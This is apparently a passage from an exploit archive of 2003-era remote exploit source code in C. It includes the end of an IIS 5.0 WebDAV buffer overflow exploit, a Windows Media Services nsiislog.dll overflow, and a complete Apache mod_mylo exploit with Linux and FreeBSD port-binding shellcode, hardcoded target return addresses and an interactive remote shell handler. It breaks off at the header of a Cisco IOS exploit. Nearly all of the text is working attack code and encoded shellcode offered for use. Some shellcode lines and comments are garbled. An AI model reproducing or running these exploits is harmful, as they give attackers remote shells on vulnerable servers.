"\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\x f3\x89"
"\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\x cf\xf3"
"\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x 09\xf1"
"\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\x c8\xbf"
"\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\x bd\xd9"
"\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\x ca\x66"
"\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\x d9\x99"
"\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x 99\xcf"
"\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x 99\x32"
"\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\x c9\x14"
"\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x 99\xf3"
"\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\x aa\x59"
"\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x 96\x1b"
"\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x 99\x99"
"\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x 99\xb9"
"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x 2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\x c9\x66"
"\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x 99\xc9"
"\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\x d9\x99"
"\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\x fc\xbf"
"\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\x bc\xd9"
"\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x 0c\xd6"
"\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x 1e\xfe"
"\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x 2c\xc8"
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\x c9\x66"
"\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x 99\x14"
"\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x 99\x34"
"\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\x bc\xd9"
"\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x 1c\xf8"
"\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x 1c\xc8"
"\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x 66\x0c"
"\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x 70\x20"
"\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x 0c\x8b"
"\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\x cf\xf1"
"\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\x c7\xc8"
"\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x 35\x1d"
"\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\x da\xd2"
"\xaa\xab\x99\xea\xf6\xfa\xf2\xfc\xed\x99\xfb\xf0\x f7\xfd"
"\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa\xfa\xfc\x e9\xed"
"\x99\xea\xfc\xf7\xfd\x99\xeb\xfc\xfa\xef\x99\xfa\x f5\xf6"
"\xea\xfc\xea\xf6\xfa\xf2\xfc\xed\x99\xd2\xdc\xcb\x d7\xdc"
"\xd5\xaa\xab\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xf0\x e9\xfc"
"\x99\xde\xfc\xed\xca\xed\xf8\xeb\xed\xec\xe9\xd0\x f7\xff"
"\xf6\xd8\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6\x fa\xfc"
"\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\x fd\xc9"
"\xf0\xe9\xfc\x99\xde\xf5\xf6\xfb\xf8\xf5\xd8\xf5\x f5\xf6"
"\xfa\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\x eb\xf0"
"\xed\xfc\xdf\xf0\xf5\xfc\x99\xca\xf5\xfc\xfc\xe9\x 99\xda"
"\xf5\xf6\xea\xfc\xd1\xf8\xf7\xfd\xf5\xfc\x99\xdc\x e1\xf0"
"\xed\xc9\xeb\xf6\xfa\xfc\xea\xea\x99\xda\xf6\xfd\x fc\xfd"
"\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xa5\xf0\xe3\x f8\xf7"
"\xd9\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\x fe\xa7"
"\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x 99\x99"
"\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x 99\x99"
"\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x 90\x90";
unsigned char jumpcode[] = "\x8b\xf9\x32\xc0\xfe\xc0\xf2\xae\xff\xe7";
char body[] = "<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n"
"</g:searchrequest>\r\n";
void usage(char *prog)
{
printf("Remote Exploit for IIS 5.0 WebDAV by Xnuxer\n"
"Bug overflow NTDLL.DLL\n"
"Usage: %s <victim>\n", prog);
exit(-1);
}
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int main(int argc, char **argv)
{
struct hostent *he;
struct sockaddr_in sock1;
struct sockaddr_in sock2;
unsigned short port;
unsigned long ret=RET;
char buffer[100000];
int sock, sck, h,i,j;
if (argc != 2) usage(argv[0]);
printf("Resolving %s .. ", argv[1]);
if ((he = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Unknown host\n");
exit(-1);
}
printf("Resolved\n");
port = htons(31337);
port ^= 0x9999;
*(unsigned short *)&shellcode[PORT_OFFSET] = port;
*(unsigned long *)&shellcode[LOADL_OFFSET] = LOADLIBRARYA ^ 0x99999999;
*(unsigned long *)&shellcode[GETPROC_OFFSET] = GETPROCADDRESS ^ 0x99999999;
bcopy(he->h_addr, &sock1.sin_addr, he->h_length);
sock1.sin_family = AF_INET;
sock1.sin_port = htons(80);
printf("[+] Attacking to %s via port: 80\n", argv[1]);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Failed to create socket");
exit(-1);
}
if (connect(sock, (struct sockaddr *)&sock1, sizeof(sock1)) == -1)
{
perror("Failed to connect");
exit(-1);
}
bzero(buffer,100000);
strcpy(buffer,"SEARCH /");
i = strlen(buffer);
buffer[i] = NOP;
for (j=i+1; j < i+2150; j+=2)
*(unsigned short *)&buffer[j] = (unsigned short)ret;
for (; j < i+65535-strlen(jumpcode); j++)
buffer[j] = NOP;
memcpy(&buffer[j], jumpcode, strlen(jumpcode));
strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\n"
"Content-Length: %d\r\n\r\n", argv[1], strlen(body)
+ strlen(shellcode));
strcpy(buffer+strlen(buffer), body);
memset(buffer+strlen(buffer), 0x01, 1);
memset(buffer+strlen(buffer), NOP, 3);
strcpy(buffer+strlen(buffer), shellcode);
if (send(sock, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("Failed to send");
exit(-1);
}
printf("[+] Overflow sent, waiting for 5 seconds\n");
sleep(5);
bcopy(he->h_addr, &sock2.sin_addr, he->h_length);
sock2.sin_family = AF_INET;
sock2.sin_port = htons(31337);
printf("[+] Connecting to %s: 31337\n", argv[1]);
if ((sck = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("Failed to create socket");
exit(-1);
}
if (connect(sck, (struct sockaddr *)&sock2, sizeof(sock2)) == -1)
{
printf("[+] Unable to connect.\n"
"[+] Exploitation failed, maybe blocked by firewall.\n");
close(sock);
close(sck);
exit(-1);
}
close(sock);
printf("[+] Successfull, attempting to join shell ...\n\n");
shell(sck);
return 0;
}
// [2003-07-08]
80 MS Windows Media Services (nsiislog.dll) Remote Exploit
#include <stdio.h>
#include <winsock2.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
char *hostName = NULL;
unsigned char shellcode[]=
"\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\x c5\x15\x90\x90"
"\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x 97\x40\xe2\xfa"
"\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x 68\xc4\xf3\x36"
"\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\x a4\x4c\x2c\x97"
"\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x 68\x28\x98\x14"
"\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\x ac\xda\xcd\xe2"
"\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\x d2\xe2\x4e\x14"
"\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\x ae\xdc\xd2\xc5"
"\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\x a4\x68\x1c\xd1"
"\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\x c7\xe2\x9e\x16"
"\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x 7c\x72\x94\x68"
"\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x 1c\x6d\x1c\xd1"
"\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x 94\xd9\x8b\x94"
"\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x 60\x1c\x40\xa4"
"\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\x c5\xc7\xc4\x68"
"\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x 93\xcd\xa4\x57"
"\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x 9e\xc5\xc1\xc4"
"\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\x cd\x1c\x4f\xa4"
"\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x 95\xe3\x9e\xc5"
"\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\x c7\xd7\xc7\x68"
"\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\x c4\x68\xc0\x67"
"\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\x df\xc7\xc0\xc1"
"\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x 68\xc0\x57\xdf"
"\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x 63\x1e\xd0\xab"
"\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x 96\x96\x1e\xd0"
"\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\x c7\x3a\xc1\xa4"
"\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\x e1\x6b\x68\xc0"
"\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x 23\x93\xc7\x56"
"\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x 22\x93\xc7\xc7"
"\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\x eb\xb5\xa4\x57"
"\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x 57\xe3\xb8\xa4"
"\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\x c0\x77\x7c\x5f"
//A??A??A??A??A??A??A??A??A??A??SHELLCODEA??A??A??A? ?A?? \xc0\x6b\xa4\x5e\xc6\xc7A??
//A??WRITEFILEA??A??A??2A??A??A??A??A??A??A??A??A??A ??A??A??A??A??A??
"\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xa4\x 5e\xc6\xc0\xc7"
"\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x 7c\x3d\xc7\x68"
"\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\x b3\x9b\x92\x2f"
"\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x 7c\x7b\x7f\x75"
"\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\x b4\x17\x70\xe0"
"\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x 97\xdc\xd2\xc5"
"\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\x c7\xfe\xe7\xf2"
"\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\x f9\xf1\xf8\xd6"
"\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\x e4\xe4\xd6\x97"
"\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\x c7\xf2\xf2\xfc"
"\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\x f8\xf5\xf6\xfb"
"\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\x fe\xfb\xf2\x97"
"\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\x f2\xe7\x97\xd2"
"\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\x c0\xc4\xd8\xd4"
"\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\x fe\xf9\xf3\x97"
"\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\x e3\x97\xe4\xf2"
"\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x 97\x97\x97\x97"
"\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\x f2\xef\xf2\x97"
"\x68\x68\x68\x68";
void main (int argc, char **argv)
{
WSADATA WSAData;
SOCKET s;
SOCKADDR_IN addr_in;
unsigned char buf[1000];
unsigned char testbuf[0x10000];
int len;
char t1[]="POST /scripts/nsiislog.dll HTTP/1.1\r\nHost: 192.168.10.210\r\nContent-length: 65536\r\n\r\n";//4364
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}
hostName = argv[1];
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(80);
addr_in.sin_addr.S_un.S_addr=inet_addr(hostName);
memset(testbuf,0,0x10000);
if ((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVA LID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(s,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCK ET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
len=sizeof(t1)-1;
memcpy(testbuf,t1,len);
send(s,testbuf,len,0);
recv(s,buf,1000,0);
memset(testbuf,'A',65536);//4364
len=65536;//4364;
*(DWORD *)(testbuf+0x2704)=0x04eb06eb;//jmpA??A??A??A??A??A??A??A??
*(DWORD *)(testbuf+0x2708)=0x40F0135c;//A??A??A??A??A??A??A??A??
memcpy(testbuf+0x270c,shellcode,sizeof(shellcode)) ;
send(s,testbuf,len,0);
closesocket (s);
WSACleanup();
return;
}
// [2003-07-14]
80 Apache 1.3.x mod_mylo Remote Code Execution Exploit
/*
Apache + mod_mylo remote exploit
By Carl Livitt / July 2003
carllivitt at hush dot com
Public release - Linux and FreeBSD targets.
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <time.h>
#include <stdarg.h>
#define SIZ 8096
#define HTTP_PORT 80
#define SHELL_PORT 45295
#define SOCKET_ERR -2
#define CONNECT_ERR -3
#define HOST_NOT_RESOLVED -4
#define BRUTE_FORCE_EXHAUSTED -5
#define SHELL_NOT_FOUND -7
#define SUCCESS 1
#define FAILED 0
// The following shellcode had 0x3f (?) chars in it which
// cause termination of our HTTP GET before the whole
// shellcode is written to the stack. The 0x3f's are
// needed because they are the dup2() syscall numbers. So,
// I've changed them to 0x3e's and INC'd them before doing
// an INT 0x80. Other than that, this shellcode is eSDee's.
// --------
// linux x86 shellcode by eSDee of Netric (www.netric.org)
// 200 byte - forking portbind shellcode - port=0xb0ef(45295)
char linux_shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
"\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
"\x89\xc1\x31\xc0\x31\xdb\x50\x50"
"\x50\x66\x68\xb0\xef\xb3\x02\x66"
"\x53\x89\xe2\xb3\x10\x53\xb3\x02"
"\x52\x51\x89\xca\x89\xe1\xb0\x66"
"\xcd\x80\x31\xdb\x39\xc3\x74\x05"
"\x31\xc0\x40\xcd\x80\x31\xc0\x50"
"\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
"\x80\x89\xd7\x31\xc0\x31\xdb\x31"
"\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
"\x80\x31\xc0\x31\xdb\x50\x50\x57"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
"\x89\xc6\x31\xc0\x31\xdb\xb0\x02"
"\xcd\x80\x39\xc3\x75\x40\x31\xc0"
"\x89\xfb\xb0\x06\xcd\x80\x31\xc0"
"\x31\xc9\x89\xf3\xb0\x3e\xfe\xc0\xcd\x80"
"\x31\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31"
"\xc0\x41\xb0\x3e\xfe\xc0\xcd\x80\x31\xc0"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x8b\x54\x24"
"\x08\x50\x53\x89\xe1\xb0\x0b\xcd"
"\x80\x31\xc0\x40\xcd\x80\x31\xc0"
"\x89\xf3\xb0\x06\xcd\x80\xeb\x99";
// This shellcode is unchanged (why reinvent the wheel ?):
// --------
/* BSD x86 shellcode by eSDee of Netric (www.netric.org)
* 194 byte - forking portbind shellcode - port=0xb0ef(45295)
*/
char freebsd_shellcode[]=
"\x31\xc0\x31\xdb\x53\xb3\x06\x53"
"\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x89\xc7\x31\xc0\x50"
"\x50\x50\x66\x68\xb0\xef\xb7\x02"
"\x66\x53\x89\xe1\x31\xdb\xb3\x10"
"\x53\x51\x57\x50\xb0\x68\xcd\x80"
"\x31\xdb\x39\xc3\x74\x06\x31\xc0"
"\xb0\x01\xcd\x80\x31\xc0\x50\x57"
"\x50\xb0\x6a\xcd\x80\x31\xc0\x31"
"\xdb\x50\x89\xe1\xb3\x01\x53\x89"
"\xe2\x50\x51\x52\xb3\x14\x53\x50"
"\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
"\x57\x50\xb0\x1e\xcd\x80\x89\xc6"
"\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
"\x39\xc3\x75\x44\x31\xc0\x57\x50"
"\xb0\x06\xcd\x80\x31\xc0\x50\x56"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x31"
"\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
"\x80\x31\xc0\x43\x53\x56\x50\xb0"
"\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x54\x53\x50\xb0\x3b"
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80"
"\x31\xc0\x56\x50\xb0\x06\xcd\x80"
"\xeb\x9a";
struct {
char *platform;
unsigned long bruteStart, bruteEnd;
unsigned long retAddr;
int offset, len;
char *shellcodePtr;
} targets[]= {
{ "SuSE 8.1, Apache 1.3.27 (installed from source) (default)", 0x08117c04,
0x08117dff, 0xbfffe9f0, 500, 4104, linux_shellcode },
{ "RedHat 7.2, Apache 1.3.20 (installed from RPM)", 0x08105104, 0x081051ff,
0xbfffe0b0, 1000, 4104, linux_shellcode },
{ "RedHat 7.3, Apache 1.3.23 (installed from RPM)", 0x080ef304, 0x080ef3ff,
0xbfffe190, 750, 4104, linux_shellcode },
{ "FreeBSD 4.8, Apache 1.3.27 (from Ports)", 0x080bf004, 0x080bf0ff, 0xbfbfea50
,3500, 4096, freebsd_shellcode },
NULL
};
char usage[]=
"Apache + mod_mylo remote exploit\n"
"By Carl Livitt (carllivitt at hush dot com)\n\n"
"Arguments: \n"
" -t target Attack 'target' host\n"
" -T platform Use parameters for target 'platform'\n"
" -h This help.\n";
void my_send(int, char *, ...);
void my_recv(int);
void make_exploitbuf(char *);
int connect_to_host(int);
int attempt_exploit(void);
void my_sleep(int n);
unsigned long retAddr=0,magic_r=0,MAGIC_R_START,MAGIC_R_END, exactPointerAddy=0;
char buf[SIZ], host[SIZ]="";
int useTarget=0;
struct hostent *hostStruct;
main(int argc, char **argv) {
int ch, i;
while((ch=getopt(argc, argv, "t:T:e:hr:"))!=-1) {
switch(ch) {
case 't':
strncpy(host, optarg, SIZ-1);
break;
case 'T':
useTarget=atoi(optarg);
break;
case 'e':
exactPointerAddy=strtoul(optarg,NULL,16);
break;
case 'r':
retAddr=strtoul(optarg,NULL,16);
break;
case 'h':
default:
printf("%s\n",usage);
printf("Available platforms:\n");
for(i=0;targets[i].platform;i++)
printf("%2d. %s\n", i, targets[i].platform);
printf("\n");
exit(0);
break; // it's good practice :)
}
}
// Sanity check
if(!retAddr && exactPointerAddy) {
printf(" You must give RET address when specifying a pointer address\n");
printf(" A good place to start is 0xbfffe0b0(linux) or 0xbfbfe0b0(freeBSD)\n");
printf(" Also remember to pass a -T x flag... things will be unpredictable\n");
printf(" if you don't!\n");
exit(0);
}
if((hostStruct=gethostbyname(host))==NULL) {
printf(" Couldn't resolve host %s\nUse '%s -h' for help\n", host,argv[0]);
exit(0);
}
switch(attempt_exploit()) {
case HOST_NOT_RESOLVED:
printf(" Couldn't connect to host: %s not found.\n", host);
break;
case SOCKET_ERR:
printf(" Couldn't grab a socket!\n");
break;
case CONNECT_ERR:
printf(" Connection to %s was rejected\n",host);
break;
case SHELL_NOT_FOUND:
printf(" This attempt failed ...\n");
break;
case BRUTE_FORCE_EXHAUSTED:
printf(" Bruteforce failed.\n");
break;
case SUCCESS:
break;
default:
printf(" ERROR: There was no error!\n");
break;
}
printf("\nHave a nice day!\n");
exit(0);
}
int attempt_exploit(void) {
fd_set rfds;
int sock,retVal,r;
if(exactPointerAddy) {
printf("[-] Using 0x%08x for pointer addy\n", exactPointerAddy);
if((sock=connect_to_host(HTTP_PORT))<=0)
return sock;
magic_r=exactPointerAddy;
make_exploitbuf(buf);
my_send(sock, buf);
my_recv(sock);
close(sock);
my_sleep(100000);
if((sock=connect_to_host(SHELL_PORT))<=0) {
return sock;
}
} else { // Do crappy bruteforce loop
printf("[-] Attempting attack [ %s ] ...\n", targets[useTarget].platform);
MAGIC_R_START=targets[useTarget].bruteStart;
MAGIC_R_END=targets[useTarget].bruteEnd;
retAddr=targets[useTarget].retAddr;
for(magic_r=MAGIC_R_START; magic_r<=MAGIC_R_END; magic_r++) {
printf("[-] Trying 0x%08x ... \r", magic_r);fflush(stdout);
if((sock=connect_to_host(HTTP_PORT))<=0)
return sock;
make_exploitbuf(buf);
my_send(sock, buf);
my_recv(sock);
close(sock);
my_sleep(50000);
if((sock=connect_to_host(SHELL_PORT))>=SUCCESS) {
printf("\n[-] Found request_rec address @ 0x%08x\n", magic_r);
break;
}
}
if(magic_r>MAGIC_R_END)
return BRUTE_FORCE_EXHAUSTED;
}
printf("[-] Connected to %s! You can type commands now:\n", host);
// Now let the attacker issue commands to the remote
// shell, just as if (s)he had launched 'nc host 45295'.
do {
FD_ZERO(&rfds);
FD_SET(0, &rfds);
FD_SET(sock, &rfds);
retVal=select(sock+1, &rfds, NULL, NULL, NULL);
if(retVal) {
if(FD_ISSET(sock, &rfds)) {
buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad!
printf("%s", buf);
}
if(FD_ISSET(0, &rfds)) {
buf[(r=read(0, buf, SIZ-1))]='\0'; // bad!
send(sock, buf, strlen(buf), 0);
}
}
} while(retVal && r); // loop until connection terminates
close(sock);
return SUCCESS;
}
// Given a port number, connects to an already resolved hostname...
// connects a TCP stream and returns a socket number (or returns error)
int connect_to_host(int p) {
int sock;
struct sockaddr_in saddr;
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= =-1)
return SOCKET_ERR;
memset((void *)&saddr, 0, sizeof(struct sockaddr_in));
saddr.sin_family=AF_INET;
saddr.sin_addr.s_addr=*((unsigned long *)hostStruct->h_addr_list[0]);
saddr.sin_port=htons(p);
if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) {
close(sock);
return CONNECT_ERR;
} else
return sock;
}
void make_exploitbuf(char *b) {
unsigned long *ptr;
char *sc=(char *)&targets[useTarget].shellcodePtr[0];
memset(b,0x00,SIZ-1);
strcat(b,"GET ");
memset(b+4,0x90,targets[useTarget].len);
memcpy((b+targets[useTarget].len)-(strlen(sc)+targets[useTarget].offset)-9,sc,strlen(sc));
ptr=(unsigned long *)&b[strlen(b)];
*(ptr++)=retAddr;
*ptr=magic_r;
strcat(b, "\n\n");
}
// Handy little function to send formattable data down a socket.
void my_send(int s, char *b, ...) {
va_list ap;
char *buf;
va_start(ap,b);
vasprintf(&buf,b,ap);
send(s,buf,strlen(buf),0);
va_end(ap);
free(buf);
}
// Another handy function to read data from a socket.
void my_recv(int s) {
int len;
char buf[SIZ];
len=recv(s, buf, SIZ-1, 0);
buf[len]=0;
}
// Wrapper for nanosleep()... just pass 'n' nanoseconds to it.
void my_sleep(int n) {
struct timespec t;
t.tv_sec=0;
t.tv_nsec=n;
nanosleep(&t,&t);
}
// [2003-07-28]
80 Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit
/*
* ..--==[[ Phenoelit ]]==--..
* / \
